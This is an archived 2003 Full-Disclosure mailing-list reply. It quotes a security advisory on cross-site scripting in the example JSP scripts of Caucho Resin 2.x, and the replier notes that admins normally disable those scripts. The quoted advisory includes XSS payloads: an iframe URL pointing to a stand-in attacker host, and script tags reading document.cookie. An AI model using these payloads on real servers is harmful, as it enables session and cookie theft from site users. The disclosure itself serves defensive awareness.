[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-Disclosure] Caucho Resin 2.x - Cross Site Scripting

To: morning_wood <se_cur_ity@hotmail.com>, full-disclosure@lists.netsys.com
Subject: Re: [Full-Disclosure] Caucho Resin 2.x - Cross Site Scripting
From: jelmer <jkuperus@planet.nl>
Date: Sun, 19 Oct 2003 21:22:40 +0200

Donny,

These are in the example applications, which any sane admin should disable
right away, much like caucho-status
These are basic procedures in setting up a server.


--jelmer





----- Original Message ----- 
From: "morning_wood" <se_cur_ity@hotmail.com>
To: <full-disclosure@lists.netsys.com>
Sent: Sunday, October 19, 2003 12:37 PM
Subject: [Full-Disclosure] Caucho Resin 2.x - Cross Site Scripting


> -----------------------------------------------------------------
>           - EXPL-A-2003-026 exploitlabs.com Advisory 026 -
> -----------------------------------------------------------------
>                               -= Caucho Resin =-
>
>
> Donnie Werner
> Oct 18, 2003
>
>
>
> Vunerability(s):
> ----------------
> 1. XSS
>
>
> note: this is not
>
> http://www.securiteam.com/securitynews/5KP0O1F7FM.html
> http://www.securitytracker.com/alerts/2002/Jun/1004552.html
>
>
> Product:
> --------
> Caucho Resin Httpd 2.x
>
> Reviews:
> --------
> http://www.caucho.com/sales/customers.xtp
>
>
> Description of product:
> -----------------------
> "Resin® is a cutting-edge XML Application Server.
> It serves the fastest servlets and JSP."
>
>
> VUNERABILITY / EXPLOIT
> ======================
> default port 8080 ( others used )
>
> affected scripts:
> env.jsp
> form.jsp
> session.jsp
> tictactoe.jsp
>
>
http://[host]:8080/examples/tictactoe/tictactoe.jsp?move=<iframe%20src="http://attcker/evil.cgi";></iframe>4
> or
>
<SCRIPT>alert(document.domain);</SCRIPT><SCRIPT>alert(document.cookie);</SCR
> IPT>
>
> the above is only an example, all cookie and session
>  stealing Cross Site Scripting was possible.
>
>
> guestbook.jsp allows persistant XSS
>
> enter evil javascript in "name" and "comment" fields
> it is then re-rendered upon revisit
>
>
>
>
> Local:
> ------
> nay
>
> Remote:
> -------
> yeh
>
>
> Vendor Fix:
> -----------
> Versions 3.x dont have the examples included
>
>
>
> Vendor Contact:
> ---------------
> bugs@caucho.com
> Concurrent with this advisory
>
>
> Credits:
> --------
> Donnie Werner
> CTO E2 Labs
> http://e2-labs.cpm
> morning_wood@e2-labs.com
>
> http://nothackers.org
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Follow-Ups:
- Re: [Full-Disclosure] Caucho Resin 2.x - Cross Site Scripting
  - From: Gregory Steuck <greg-fulldisclosure@nest.cx>

References:
- [Full-Disclosure] Caucho Resin 2.x - Cross Site Scripting
  - From: "morning_wood" <se_cur_ity@hotmail.com>

Prev by Date: [Full-Disclosure] ByteHoard Directory Traversal Vulnerability
Next by Date: [Full-Disclosure] Vulneraibilty Asesment report in NASA.GOV Websites [not finished , only news]
Previous by thread: [Full-Disclosure] Caucho Resin 2.x - Cross Site Scripting
Next by thread: Re: [Full-Disclosure] Caucho Resin 2.x - Cross Site Scripting
Index(es):
- Date
- Thread